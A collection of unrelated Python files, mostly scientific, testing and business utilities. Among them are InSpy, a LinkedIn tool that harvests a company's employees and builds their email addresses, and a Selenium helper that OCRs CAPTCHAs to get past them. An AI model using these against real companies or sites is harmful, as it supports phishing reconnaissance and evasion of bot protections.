        # frames whose ESO DPR TYPE starts with 'OBJECT' are science frames
        datatype = head['ESO DPR TYPE']
        if datatype.split(',')[0]=='OBJECT':
            imgtype = 'sci'
        else:
            imgtype = 'cal'

        # find the binning factor
        _, _, binx, biny = get_ccd_geometry(head)
        # bugfix: the second field used to repeat binx instead of biny
        binning = '({:d}, {:d})'.format(binx, biny)

        # determine the total number of saturated pixels
        saturation = (data>=65535).sum()

        # find the 95% quantile
        quantile95 = int(np.round(np.percentile(data, 95)))

        item = [frameid, fileid, imgtype, datatype, objectname, exptime,
                binning, saturation, quantile95]
        logtable.add_row(item)
        item = logtable[-1]

        # print log item with colors
        string_lst = [
                ' {:>5s}'.format('[{:d}]'.format(frameid)),
                ' {:23s}'.format(fileid),
                ' ({:3s})'.format(imgtype),
                ' {:11s}'.format(datatype),
                ' {:15s}'.format(objectname),
                ' Texp = {:4g}'.format(exptime),
                ' Binning = {:5s}'.format(binning),
                ' Nsat = {:6d}'.format(saturation),
                ' Q95 = {:5d}'.format(quantile95),
                ]
        string = ''.join(string_lst)
        print(print_wrapper(string, item))

        frameid += 1

    # determine filename of logtable; use the obsdate of the first frame
    obsdate = logtable[0]['fileid'][0:10]
    outname = '{}.obslog'.format(obsdate)
    # append an increasing index until the name does not collide
    outfilename = outname
    i = 0
    while os.path.exists(outfilename):
        i += 1
        outfilename = '{}.{}.obslog'.format(obsdate, i)

    # set display formats
    logtable['imgtype'].info.format = '^s'
    logtable['datatype'].info.format = '<s'
    logtable['object'].info.format = '<s'
    logtable['exptime'].info.format = 'g'

    # 'with' guarantees the file is closed even if formatting raises
    with open(outfilename, 'w') as outfile:
        for row in logtable.pformat_all():
            outfile.write(row+os.linesep)
def reduce_rawdata():
    """2D to 1D pipeline for FEROS.

    Loads the config file and observing log found in the current working
    directory and runs the FEROS reduction on them.
    """
    # read obslog and config (raw strings: '\S' is an invalid escape in a
    # plain string literal and deprecated in python 3)
    config = load_config(r'FEROS\S*\.cfg$')
    logtable = load_obslog(r'\S*\.obslog$', fmt='astropy')

    reduce_feros(config, logtable)
|
#!/usr/bin/env python
'''
test_brozzling.py - XXX explain
Copyright (C) 2016-2018 Internet Archive
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import argparse
import http.server
import json
import logging
import os
import socket
import threading
import threading
import urllib
import urllib.error
import urllib.request

import pytest

import brozzler
# minimal stand-in for brozzler's CLI args, used only to configure logging
# for this test module
args = argparse.Namespace()
args.log_level = logging.INFO
brozzler.cli.configure_logging(args)

# canned Warcprox-Meta payload served by the /420 endpoint of the httpd
# fixture below and asserted against in test_420
WARCPROX_META_420 = {
    'stats': {
        'test_limits_bucket': {
            'total': {'urls': 0, 'wire_bytes': 0},
            'new': {'urls': 0, 'wire_bytes': 0},
            'revisit': {'urls': 0, 'wire_bytes': 0},
            'bucket': 'test_limits_bucket'
        }
    },
    'reached-limit': {'test_limits_bucket/total/urls': 0}
}
@pytest.fixture(scope='module')
def httpd(request):
    """Module-scoped http server rooted at the tests' htdocs directory.

    Adds two special endpoints: /420 (warcprox-style "reached limit"
    response carrying a Warcprox-Meta header) and /401 (basic-auth
    challenge).
    """
    class RequestHandler(http.server.SimpleHTTPRequestHandler):
        def __init__(self, *args, **kwargs):
            # serve .mpd manifests with the proper MPEG-DASH content type
            self.extensions_map['.mpd'] = 'video/vnd.mpeg.dash.mpd'
            http.server.SimpleHTTPRequestHandler.__init__(self, *args, **kwargs)

        def do_GET(self):
            if self.path == '/420':
                self.send_response(420, 'Reached limit')
                self.send_header('Connection', 'close')
                self.send_header('Warcprox-Meta', json.dumps(WARCPROX_META_420))
                payload = b'request rejected by warcprox: reached limit test_limits_bucket/total/urls=0\n'
                self.send_header('Content-Type', 'text/plain;charset=utf-8')
                self.send_header('Content-Length', len(payload))
                self.end_headers()
                self.wfile.write(payload)
            elif self.path == '/401':
                self.send_response(401)
                self.send_header('WWW-Authenticate', 'Basic realm="Test"')
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                # bugfix: on python 3 self.headers is an email.message
                # mapping with no getheader() (that was python 2), and
                # wfile expects bytes, not str
                auth = self.headers.get('Authorization')
                if auth:
                    self.wfile.write(auth.encode('utf-8'))
                self.wfile.write(b'not authenticated')
            else:
                super().do_GET()

    # SimpleHTTPRequestHandler always uses CWD so we have to chdir
    os.chdir(os.path.join(os.path.dirname(__file__), 'htdocs'))

    httpd = http.server.HTTPServer(('localhost', 0), RequestHandler)
    httpd_thread = threading.Thread(name='httpd', target=httpd.serve_forever)
    httpd_thread.start()

    def fin():
        # shut the server down cleanly at module teardown
        httpd.shutdown()
        httpd.server_close()
        httpd_thread.join()
    request.addfinalizer(fin)

    return httpd
def test_httpd(httpd):
    '''
    Tests that our http server is working as expected, and that two fetches
    of the same url return the same payload, proving it can be used to test
    deduplication.
    '''
    # bugfix: was "payload1 = content2 = None" -- the second name was a typo
    payload1 = payload2 = None
    url = 'http://localhost:%s/site1/file1.txt' % httpd.server_port
    with urllib.request.urlopen(url) as response:
        assert response.status == 200
        payload1 = response.read()
        assert payload1

    with urllib.request.urlopen(url) as response:
        assert response.status == 200
        payload2 = response.read()
        assert payload2

    assert payload1 == payload2

    # the special /420 endpoint must surface as an HTTPError with code 420
    url = 'http://localhost:%s/420' % httpd.server_port
    with pytest.raises(urllib.error.HTTPError) as excinfo:
        urllib.request.urlopen(url)
    assert excinfo.value.getcode() == 420
def test_aw_snap_hes_dead_jim():
    # browsing a deliberately crashed tab must surface as BrowsingException
    exe = brozzler.suggest_default_chrome_exe()
    with brozzler.Browser(chrome_exe=exe) as browser, \
            pytest.raises(brozzler.BrowsingException):
        browser.browse_page('chrome://crash')
def test_page_interstitial_exception(httpd):
    # the /401 endpoint sends a WWW-Authenticate challenge, which brozzler
    # reports as PageInterstitialShown
    exe = brozzler.suggest_default_chrome_exe()
    target = 'http://localhost:%s/401' % httpd.server_port
    with brozzler.Browser(chrome_exe=exe) as browser, \
            pytest.raises(brozzler.PageInterstitialShown):
        browser.browse_page(target)
def test_on_response(httpd):
    # every network response seen while browsing should be reported through
    # the on_response callback, in request order
    seen_urls = []
    def on_response(msg):
        seen_urls.append(msg['params']['response']['url'])

    exe = brozzler.suggest_default_chrome_exe()
    base = 'http://localhost:%s' % httpd.server_port
    with brozzler.Browser(chrome_exe=exe) as browser:
        browser.browse_page(base + '/site3/page.html', on_response=on_response)

    assert seen_urls[0] == base + '/site3/page.html'
    assert seen_urls[1] == base + '/site3/brozzler.svg'
    assert seen_urls[2] == base + '/favicon.ico'
def test_420(httpd):
    # a 420 response carrying a Warcprox-Meta header must raise ReachedLimit
    # with the parsed header attached
    exe = brozzler.suggest_default_chrome_exe()
    target = 'http://localhost:%s/420' % httpd.server_port
    with brozzler.Browser(chrome_exe=exe) as browser:
        with pytest.raises(brozzler.ReachedLimit) as excinfo:
            browser.browse_page(target)
    assert excinfo.value.warcprox_meta == WARCPROX_META_420
def test_js_dialogs(httpd):
    """Javascript alert/confirm/prompt pages must not hang browsing.

    Before commit d2ed6b97a24 these would hang and eventually raise
    brozzler.browser.BrowsingTimeout, which would cause this test to fail.
    """
    chrome_exe = brozzler.suggest_default_chrome_exe()
    with brozzler.Browser(chrome_exe=chrome_exe) as browser:
        # the removed local 'url' was never used; loop over the pages instead
        for page in ('alert.html', 'confirm.html', 'prompt.html'):
            browser.browse_page(
                    'http://localhost:%s/site4/%s' % (httpd.server_port, page))
        # XXX print dialog unresolved
        # browser.browse_page(
        #         'http://localhost:%s/site4/print.html' % httpd.server_port)
def test_page_videos(httpd):
    # test depends on behavior of youtube-dl and chromium, could fail and need
    # to be adjusted on youtube-dl or chromium updates
    chrome_exe = brozzler.suggest_default_chrome_exe()
    worker = brozzler.BrozzlerWorker(None)
    site = brozzler.Site(None, {})
    page = brozzler.Page(None, {
        'url':'http://localhost:%s/site6/' % httpd.server_port})
    with brozzler.Browser(chrome_exe=chrome_exe) as browser:
        worker.brozzle_page(browser, site, page)
    assert page.videos

    # the four videos we expect, in capture order
    expected_videos = [
        {
            'blame': 'youtube-dl',
            'response_code': 200,
            'content-length': 383631,
            'content-type': 'video/mp4',
            'url': 'http://localhost:%s/site6/small.mp4' % httpd.server_port,
        },
        {
            'blame': 'youtube-dl',
            'content-length': 92728,
            'content-type': 'video/webm',
            'response_code': 200,
            'url': 'http://localhost:%s/site6/small-video_280x160_100k.webm' % httpd.server_port
        },
        {
            'blame': 'youtube-dl',
            'content-length': 101114,
            'content-type': 'video/webm',
            'response_code': 200,
            'url': 'http://localhost:%s/site6/small-audio.webm' % httpd.server_port
        },
        {
            'blame': 'browser',
            # 'response_code': 206,
            # 'content-range': 'bytes 0-229454/229455',
            'response_code': 200,
            'content-length': 229455,
            'content-type': 'video/webm',
            'url': 'http://localhost:%s/site6/small.webm' % httpd.server_port,
        },
    ]
    assert len(page.videos) == len(expected_videos)
    for actual, wanted in zip(page.videos, expected_videos):
        assert actual == wanted
def test_extract_outlinks(httpd):
    # brozzling site8 must yield exactly these four outlinks
    exe = brozzler.suggest_default_chrome_exe()
    worker = brozzler.BrozzlerWorker(None)
    site = brozzler.Site(None, {})
    base = 'http://localhost:%s' % httpd.server_port
    page = brozzler.Page(None, {'url': base + '/site8/'})
    with brozzler.Browser(chrome_exe=exe) as browser:
        outlinks = worker.brozzle_page(browser, site, page)
    expected = {
        'http://example.com/offsite',
        base + '/site8/baz/zuh',
        base + '/site8/fdjisapofdjisap#1',
        base + '/site8/fdjisapofdjisap#2',
    }
    assert outlinks == expected
def test_proxy_down():
    '''
    Test that browsing raises `brozzler.ProxyError` when the proxy is down.

    See also `test_proxy_down` in test_units.py.

    Tests two different kinds of connection error:
    - nothing listening on the port (nobody listens on port 4 :))
    - port bound but not accepting connections
    '''
    # bind a port without listening on it; the 'with' block guarantees the
    # socket is closed again (the original leaked it)
    with socket.socket() as sock:
        sock.bind(('127.0.0.1', 0))
        for not_listening_proxy in (
                '127.0.0.1:4', '127.0.0.1:%s' % sock.getsockname()[1]):
            site = brozzler.Site(None, {'seed':'http://example.com/'})
            page = brozzler.Page(None, {'url': 'http://example.com/'})
            worker = brozzler.BrozzlerWorker(
                    frontier=None, proxy=not_listening_proxy)
            chrome_exe = brozzler.suggest_default_chrome_exe()
            with brozzler.Browser(chrome_exe=chrome_exe) as browser:
                with pytest.raises(brozzler.ProxyError):
                    worker.brozzle_page(browser, site, page)
|
import pytest
from keras.datasets import mnist
import numpy as np
@pytest.fixture
def mnist_dataset():
    """MNIST train/test images, scaled into [0, 1) and flattened to vectors
    (labels are discarded)."""
    (train_images, _), (test_images, _) = mnist.load_data()

    def _prep(images):
        # scale first, then flatten each image into a single row
        images = images.astype('float32') / 256.
        return images.reshape((len(images), np.prod(images.shape[1:])))

    return _prep(train_images), _prep(test_images)
|
# Generated by Django 2.2.7 on 2019-12-19 14:25
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add UserData.billable_expectation: the fraction of weekly hours
    expected to be billable (default 0.8, validated to be at most 1)."""

    dependencies = [
        ('employees', '0024_auto_20171229_1156'),
    ]

    operations = [
        migrations.AddField(
            model_name='userdata',
            name='billable_expectation',
            field=models.DecimalField(decimal_places=2, default=0.8, max_digits=3, validators=[django.core.validators.MaxValueValidator(limit_value=1)], verbose_name='Percentage of hours which are expected to be billable each week'),
        ),
    ]
|
from flask.globals import current_app
from infosystem.celery import celery, decide_on_run
from infosystem.common import exception
from infosystem.subsystem.user.email import TypeEmail
@decide_on_run
@celery.task(autoretry_for=(exception.NotFound,),
             default_retry_delay=5,
             retry_kwargs={'max_retries': 3})
def send_email(user_id: str) -> None:
    """Ask the user manager to send the activation e-mail for *user_id*.

    Retried up to 3 times (5 s apart) while the user is NotFound.
    """
    manager = current_app.api_handler.api().users()
    return manager.notify(id=user_id,
                          type_email=TypeEmail.ACTIVATE_ACCOUNT)
|
import os
import pytesseract
import logging
from PIL import Image
LOGGER = logging.getLogger(__name__)
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
# Get CAPTCHA image & extract text
class CaptchaHandler:
    """Screenshot a CAPTCHA element from a selenium driver and OCR it."""

    def __init__(self):
        # name of the temporary screenshot/crop file, stored next to this module
        self.filename = 'solved_captcha.png'

    def get_captcha(self, driver, element):
        """Screenshot `element` on `driver`, crop it out, and OCR it.

        Returns the text extracted by pytesseract, or None on failure.
        """
        LOGGER.info("Getting captcha")
        path = os.path.join(__location__, self.filename)
        location = element.location
        size = element.size

        # saves screenshot of entire page, then crop the element out of it
        driver.save_screenshot(path)
        # 'with' closes the image file handle deterministically
        with Image.open(path) as image:
            left = location['x']
            top = location['y']
            right = location['x'] + size['width']
            bottom = location['y'] + size['height']
            cropped = image.crop((left, top, right, bottom))
            cropped.save(path, 'png')

        return self.solve_captcha(path)

    @staticmethod
    def solve_captcha(img_path):
        """OCR `img_path` with pytesseract, then delete the file.

        Returns None when the file does not exist.
        """
        try:
            LOGGER.info("Solving captcha")
            # close the handle before os.remove(): deleting a file that is
            # still open fails on Windows
            with Image.open(img_path) as img:
                solution = pytesseract.image_to_string(img)
            os.remove(img_path)  # Remove the file after solving
            return solution
        except FileNotFoundError:
            return None
|
#!/usr/bin/env python2
# Copyright (c) 2016 Jonathan Broche (@g0jhonny)
from lib.logger import *
from lib.soupify import *
from lib.workbench import *
from lib.crawler import *
import os, argparse, sys, time
# NOTE(review): python 2 source ('print' statements, argparse's removed
# version= keyword); it will not run under python 3 without porting.
# --- command line interface -------------------------------------------------
parser = argparse.ArgumentParser(description='InSpy - A LinkedIn enumeration tool by Jonathan Broche (@g0jhonny)', version="2.0.2")
parser.add_argument('company', help="Company name to use for tasks.")
techgroup = parser.add_argument_group(title="Technology Search")
techgroup.add_argument('--techspy', metavar='file', const="wordlists/tech-list-small.txt", nargs='?', help="Crawl LinkedIn job listings for technologies used by the company. Technologies imported from a new line delimited file. [Default: tech-list-small.txt]")
techgroup.add_argument('--limit', metavar='int', type=int, default=50, help="Limit the number of job listings to crawl. [Default: 50]")
empgroup = parser.add_argument_group(title="Employee Harvesting")
empgroup.add_argument('--empspy', metavar='file', const="wordlists/title-list-small.txt", nargs='?', help="Discover employees by title and/or department. Titles and departments are imported from a new line delimited file. [Default: title-list-small.txt]")
empgroup.add_argument('--emailformat', metavar='string', help="Create email addresses for discovered employees using a known format. [Accepted Formats: first.last@xyz.com, last.first@xyz.com, firstl@xyz.com, lfirst@xyz.com, flast@xyz.com, lastf@xyz.com, first@xyz.com, last@xyz.com]")
outgroup = parser.add_argument_group(title="Output Options")
outgroup.add_argument('--html', metavar='file', help="Print results in HTML file.")
outgroup.add_argument('--csv', metavar='file', help="Print results in CSV format.")
outgroup.add_argument('--json', metavar='file', help="Print results in JSON.")

# with no arguments at all, show usage instead of doing nothing
if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()
start_logger(args.company)
print "\nInSpy {}\n".format(parser.version)

# at least one of the two work modes must be selected
if not args.techspy and not args.empspy:
    print "You didn't provide any work for me to do."
    sys.exit(1)

stime = time.time()
# accumulators for each output format, filled by the sections below
tech_html, employee_html, tech_csv, employee_csv, tech_json, employee_json = [], [], [], [], [], []
# --- technology search: crawl job listings and match a tech wordlist --------
if args.techspy:
    if os.path.exists(os.path.abspath(args.techspy)):
        initial_crawl = crawl_jobs(args.company)
        if initial_crawl:
            soup = soupify(initial_crawl)
            # collect up to args.limit job links from the first result page
            job_links = []
            for link in get_job_links(soup, args.company):
                if len(job_links) < args.limit:
                    job_links.append(link)
            # not enough links yet: follow the pagination links
            if len(job_links) != args.limit:
                page_links = get_page_links(soup)
                for page in range(len(page_links)):
                    if len(job_links) == args.limit: break
                    urlcrawl = crawl_url(page_links[page])
                    if urlcrawl:
                        for link in get_job_links(soupify(urlcrawl), args.company):
                            if len(job_links) < args.limit:
                                job_links.append(link)
            pstatus("{} Jobs identified".format(len(job_links)))
            if job_links:
                # map job title -> {job url: matched technologies}
                techs = {}
                for job in range(len(job_links)):
                    jobresponse = crawl_url(job_links[job])
                    if jobresponse:
                        jobsoup = soupify(jobresponse)
                        description = get_job_description(jobsoup)
                        matches = identify_tech(description, os.path.abspath(args.techspy))
                        if matches:
                            title = get_job_title(jobsoup)
                            techs[title] = {job_links[job]:matches}
                tech_html, tech_csv, tech_json = craft_tech(techs)
    else:
        perror("No such file or directory: '{}'".format(args.techspy))
# --- employee harvesting: search by titles/departments from a wordlist ------
if args.empspy:
    if os.path.exists(os.path.abspath(args.empspy)):
        employees = {}
        emails = []
        for response in crawl_employees(args.company, os.path.abspath(args.empspy)):
            for name, title in get_employees(soupify(response)).items():
                # keep only hits whose title mentions the target company
                if args.company.lower() in title.lower():
                    if not name in employees:
                        employees[name] = title
        pstatus("{} Employees identified".format(len(employees.keys())))
        if employees:
            if args.emailformat:
                # only accept one of the documented address formats
                if args.emailformat[:args.emailformat.find('@')] in ['first.last', 'last.first', 'firstlast', 'lastfirst', 'first_last', 'last_first', 'first', 'last', 'firstl', 'lfirst', 'flast', 'lastf']:
                    employee_html, employee_csv, employee_json = craft_employees(employees, args.emailformat)
                else:
                    pwarning("You didn't provide a valid e-mail format. See help (-h) for acceptable formats.")
                    employee_html, employee_csv, employee_json = craft_employees(employees, None)
            else:
                employee_html, employee_csv, employee_json = craft_employees(employees, None)
    else:
        print os.path.abspath(args.empspy)
        perror("No such file or directory: '{}'".format(args.empspy))
#output
# write whichever result sets exist in each of the requested formats
if args.html:
    if tech_html or employee_html:
        if tech_html and employee_html:
            craft_html(args.company, tech_html, employee_html, args.html)
        elif tech_html and not employee_html:
            craft_html(args.company, tech_html, None, args.html)
        else:
            craft_html(args.company, None, employee_html, args.html)
if args.csv:
    if tech_csv or employee_csv:
        if tech_csv and employee_csv:
            craft_csv(tech_csv, employee_csv, args.csv)
        elif tech_csv and not employee_csv:
            craft_csv(tech_csv, None, args.csv)
        else:
            craft_csv(None, employee_csv, args.csv)
if args.json:
    if tech_json or employee_json:
        if tech_json and employee_json:
            craft_json(tech_json, employee_json, args.json)
        elif tech_json and not employee_json:
            craft_json(tech_json, None, args.json)
        else:
            craft_json(None, employee_json, args.json)

print "Completed in {:.1f}s".format(time.time()-stime)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: MIT
# Copyright (C) 2020-2021 Mobica Limited
"""Create team file basing on specified project members"""
# Standard library imports
import sys
import json
# Third party imports
import jsonschema
# Project imports
import cjm
import cjm.cfg
import cjm.codes
import cjm.request
import cjm.run
import cjm.schema
# CLI option name for the Jira project key (also interpolated into the
# error message printed by main() when the key is missing)
_PROJECT_KEY_ARG_NAME = "--project-key"
# daily capacity assigned to every team member unless overridden on the
# command line (units not visible here -- TODO confirm)
_DEFAULT_DAILY_CAPACITY = 2
def request_users(cfg):
    """Retrieve the list of project members (all users who are assignees of
    the configured project), following the paginated user-search API."""
    user_data_url = cjm.request.make_cj_url(cfg, "user", "search", "query")
    query = "is assignee of {0:s}".format(cfg["project"]["key"])

    page_size = 50
    offset = 0
    users = []

    while True:
        response = cjm.request.make_cj_request(
            cfg, user_data_url,
            {"query": query, "startAt": offset, "maxResults": page_size})
        payload = response.json()
        users.extend(payload["values"])
        offset += page_size
        # stop once we have requested past the server-reported total
        if offset >= payload["total"]:
            return users
def main(options, defaults):
    """Entry function"""
    # layer CLI options on top of the config file on top of built-in defaults
    cfg = cjm.cfg.apply_options(cjm.cfg.apply_config(cjm.cfg.init_defaults(), defaults), options)
    cfg["project"]["key"] = options.project_key

    if cfg["project"]["key"] is None:
        sys.stderr.write(
            "ERROR: The project key is not specified. Use the '{0:s}' CLI option or the defaults"
            " file to specify it".format(_PROJECT_KEY_ARG_NAME))
        return cjm.codes.CONFIGURATION_ERROR

    # only active project members end up in the team file
    users_active = [u for u in request_users(cfg) if u["active"]]
    users = []

    for user in users_active:
        # split the display name into first/last on the first separator
        # found, trying space, then dot, then comma
        if str(user["displayName"]).find(' ') != -1:
            firstname, lastname = str(user["displayName"]).split(" ", 1)
        elif str(user["displayName"]).find('.') != -1:
            firstname, lastname = str(user["displayName"]).split(".", 1)
        elif str(user["displayName"]).find(',') != -1:
            firstname, lastname = str(user["displayName"]).split(",", 1)
        else:
            firstname = user["displayName"]
            lastname = "PLEASE-FILL"
        data = {
            # initials; duplicates are de-duplicated by make_codes_unique below
            "code": str(firstname[0] + lastname[0]).upper(),
            "last name": lastname,
            "first name": firstname,
            "account id": user["accountId"],
            "daily capacity": options.daily_capacity
        }
        users.append(data)

    make_codes_unique(users)
    people = {"people": users}
    # NOTE(review): the team file is printed unconditionally here AND again
    # below when --json output is requested -- the first print looks like
    # debug leftover; confirm which one is intended
    print(json.dumps(people, indent=4, separators=(',', ': ')))
    jsonschema.validate(people, cjm.schema.load(cfg, "team.json"))

    if options.json_output:
        print(json.dumps(people, indent=4, sort_keys=False))

    return cjm.codes.NO_ERROR
def make_codes_unique(users):
    """Ensure that user codes are unique by adding unique index postfix to all the duplicates"""
    # first pass: how many times does each code occur?
    occurrences = {}
    for user in users:
        occurrences[user["code"]] = occurrences.get(user["code"], 0) + 1

    # second pass: append a 1-based running index to every duplicated code
    running = {}
    for user in users:
        code = user["code"]
        running[code] = running.get(code, 0) + 1
        if occurrences[code] > 1:
            user["code"] = "{0:s}{1:d}".format(code, running[code])
def parse_options(args, defaults):
    """Parse command line options"""
    parser = cjm.cfg.make_common_parser(defaults)

    default_project_key = defaults.get("project", {}).get("key")

    parser.add_argument(
        _PROJECT_KEY_ARG_NAME, action="store", metavar="KEY", dest="project_key",
        default=default_project_key,
        help=(
            "Project for which the team will be associated{0:s}"
            "".format(cjm.cfg.fmt_dft(default_project_key))))
    # type=int keeps the parsed value consistent with the int default
    parser.add_argument(
        "--daily_capacity", action="store", type=int,
        default=_DEFAULT_DAILY_CAPACITY, dest="daily_capacity",
        # bugfix: the two help fragments used to concatenate with no
        # separator ("...team membercurrent default: 2")
        help=("Change default daily capacity for every team member; "
              f"current default: {_DEFAULT_DAILY_CAPACITY}"))

    return parser.parse_args(args)
# standard cjm entry point: parse CLI options, then run main()
if __name__ == "__main__":
    cjm.run.run_2(main, parse_options)
|
#!/usr/bin/env python
import unittest
from pymodbus.compat import IS_PYTHON3
if IS_PYTHON3:
from unittest.mock import patch, Mock
else: # Python 2
from mock import patch, Mock
from pymodbus.client.async.twisted import (
ModbusClientProtocol, ModbusUdpClientProtocol, ModbusSerClientProtocol, ModbusTcpClientProtocol
)
from pymodbus.factory import ClientDecoder
from pymodbus.client.async.twisted import ModbusClientFactory
from pymodbus.exceptions import ConnectionException
from pymodbus.transaction import ModbusSocketFramer, ModbusRtuFramer
from pymodbus.bit_read_message import ReadCoilsRequest, ReadCoilsResponse
#---------------------------------------------------------------------------#
# Fixture
#---------------------------------------------------------------------------#
class AsynchronousClientTest(unittest.TestCase):
    '''
    This is the unittest for the pymodbus.client.async module

    NOTE(review): the module under test lives at ``pymodbus.client.async``,
    a path that cannot be imported on python 3.7+ where "async" became a
    reserved keyword.
    '''

    #-----------------------------------------------------------------------#
    # Test Client Protocol
    #-----------------------------------------------------------------------#
    def testClientProtocolInit(self):
        ''' Test the client protocol initialize '''
        protocol = ModbusClientProtocol()
        self.assertEqual(0, len(list(protocol.transaction)))
        self.assertFalse(protocol._connected)
        self.assertTrue(isinstance(protocol.framer, ModbusSocketFramer))
        # a caller-supplied framer must be used as-is, not replaced
        framer = object()
        protocol = ModbusClientProtocol(framer=framer)
        self.assertEqual(0, len(list(protocol.transaction)))
        self.assertFalse(protocol._connected)
        self.assertTrue(framer is protocol.framer)

    def testClientProtocolConnect(self):
        ''' Test the client protocol connect '''
        decoder = object()
        framer = ModbusSocketFramer(decoder)
        protocol = ModbusClientProtocol(framer=framer)
        self.assertFalse(protocol._connected)
        protocol.connectionMade()
        self.assertTrue(protocol._connected)

    def testClientProtocolDisconnect(self):
        ''' Test the client protocol disconnect '''
        protocol = ModbusClientProtocol()
        protocol.connectionMade()
        def handle_failure(failure):
            self.assertTrue(isinstance(failure.value, ConnectionException))
        # pending responses must errback with ConnectionException on loss
        d = protocol._buildResponse(0x00)
        d.addErrback(handle_failure)
        self.assertTrue(protocol._connected)
        protocol.connectionLost('because')
        self.assertFalse(protocol._connected)

    def testClientProtocolDataReceived(self):
        ''' Test the client protocol data received '''
        protocol = ModbusClientProtocol(ModbusSocketFramer(ClientDecoder()))
        protocol.connectionMade()
        out = []
        # socket-framed frame that decodes to a ReadCoilsResponse
        data = b'\x00\x00\x12\x34\x00\x06\xff\x01\x01\x02\x00\x04'
        # setup existing request
        d = protocol._buildResponse(0x00)
        d.addCallback(lambda v: out.append(v))
        protocol.dataReceived(data)
        self.assertTrue(isinstance(out[0], ReadCoilsResponse))

    def testClientProtocolExecute(self):
        ''' Test the client protocol execute method '''
        framer = ModbusSocketFramer(None)
        protocol = ModbusClientProtocol(framer=framer)
        protocol.connectionMade()
        protocol.transport = Mock()
        protocol.transport.write = Mock()
        request = ReadCoilsRequest(1, 1)
        d = protocol.execute(request)
        tid = request.transaction_id
        self.assertEqual(d, protocol.transaction.getTransaction(tid))

    def testClientProtocolHandleResponse(self):
        ''' Test the client protocol handles responses '''
        protocol = ModbusClientProtocol()
        protocol.connectionMade()
        out = []
        reply = ReadCoilsRequest(1, 1)
        reply.transaction_id = 0x00
        # handle skipped cases
        protocol._handleResponse(None)
        protocol._handleResponse(reply)
        # handle existing cases
        d = protocol._buildResponse(0x00)
        d.addCallback(lambda v: out.append(v))
        protocol._handleResponse(reply)
        self.assertEqual(out[0], reply)

    def testClientProtocolBuildResponse(self):
        ''' Test the client protocol builds responses '''
        protocol = ModbusClientProtocol()
        self.assertEqual(0, len(list(protocol.transaction)))
        def handle_failure(failure):
            self.assertTrue(isinstance(failure.value, ConnectionException))
        # building a response while disconnected must errback immediately
        d = protocol._buildResponse(0x00)
        d.addErrback(handle_failure)
        self.assertEqual(0, len(list(protocol.transaction)))
        protocol._connected = True
        d = protocol._buildResponse(0x00)
        self.assertEqual(1, len(list(protocol.transaction)))

    #-----------------------------------------------------------------------#
    # Test TCP Client Protocol
    #-----------------------------------------------------------------------#
    def testTcpClientProtocolInit(self):
        ''' Test the tcp client protocol initialize '''
        protocol = ModbusTcpClientProtocol()
        self.assertEqual(0, len(list(protocol.transaction)))
        self.assertTrue(isinstance(protocol.framer, ModbusSocketFramer))
        framer = object()
        protocol = ModbusClientProtocol(framer=framer)
        self.assertTrue(framer is protocol.framer)

    #-----------------------------------------------------------------------#
    # Test Serial Client Protocol
    #-----------------------------------------------------------------------#
    def testSerialClientProtocolInit(self):
        ''' Test the serial client protocol initialize '''
        protocol = ModbusSerClientProtocol()
        self.assertEqual(0, len(list(protocol.transaction)))
        self.assertTrue(isinstance(protocol.framer, ModbusRtuFramer))
        framer = object()
        protocol = ModbusClientProtocol(framer=framer)
        self.assertTrue(framer is protocol.framer)

    #-----------------------------------------------------------------------#
    # Test Udp Client Protocol
    #-----------------------------------------------------------------------#
    def testUdpClientProtocolInit(self):
        ''' Test the udp client protocol initialize '''
        protocol = ModbusUdpClientProtocol()
        self.assertEqual(0, len(list(protocol.transaction)))
        self.assertTrue(isinstance(protocol.framer, ModbusSocketFramer))
        framer = object()
        protocol = ModbusClientProtocol(framer=framer)
        self.assertTrue(framer is protocol.framer)

    def testUdpClientProtocolDataReceived(self):
        ''' Test the udp client protocol data received '''
        protocol = ModbusUdpClientProtocol()
        out = []
        # socket-framed frame that decodes to a ReadCoilsResponse
        data = b'\x00\x00\x12\x34\x00\x06\xff\x01\x01\x02\x00\x04'
        server = ('127.0.0.1', 12345)
        # setup existing request
        d = protocol._buildResponse(0x00)
        d.addCallback(lambda v: out.append(v))
        protocol.datagramReceived(data, server)
        self.assertTrue(isinstance(out[0], ReadCoilsResponse))

    def testUdpClientProtocolExecute(self):
        ''' Test the udp client protocol execute method '''
        protocol = ModbusUdpClientProtocol()
        protocol.transport = Mock()
        protocol.transport.write = Mock()
        request = ReadCoilsRequest(1, 1)
        d = protocol.execute(request)
        tid = request.transaction_id
        self.assertEqual(d, protocol.transaction.getTransaction(tid))

    def testUdpClientProtocolHandleResponse(self):
        ''' Test the udp client protocol handles responses '''
        protocol = ModbusUdpClientProtocol()
        out = []
        reply = ReadCoilsRequest(1, 1)
        reply.transaction_id = 0x00
        # handle skipped cases
        protocol._handleResponse(None)
        protocol._handleResponse(reply)
        # handle existing cases
        d = protocol._buildResponse(0x00)
        d.addCallback(lambda v: out.append(v))
        protocol._handleResponse(reply)
        self.assertEqual(out[0], reply)

    def testUdpClientProtocolBuildResponse(self):
        ''' Test the udp client protocol builds responses '''
        protocol = ModbusUdpClientProtocol()
        self.assertEqual(0, len(list(protocol.transaction)))
        d = protocol._buildResponse(0x00)
        self.assertEqual(1, len(list(protocol.transaction)))

    #-----------------------------------------------------------------------#
    # Test Client Factories
    #-----------------------------------------------------------------------#
    def testModbusClientFactory(self):
        ''' Test the base class for all the clients '''
        factory = ModbusClientFactory()
        self.assertTrue(factory is not None)
#---------------------------------------------------------------------------#
# Main
#---------------------------------------------------------------------------#
# run the test suite when this file is executed directly
if __name__ == "__main__":
    unittest.main()
|
import pandas as pd
from sklearn.model_selection import train_test_split
# Column names of the 28 UCI HIGGS features, in file order (the csv's
# leading column is the class label, named separately in load_uci_higgs).
# NOTE(review): "lepton phi" uses a space while every other name uses an
# underscore -- this looks like a typo, but renaming it would change the
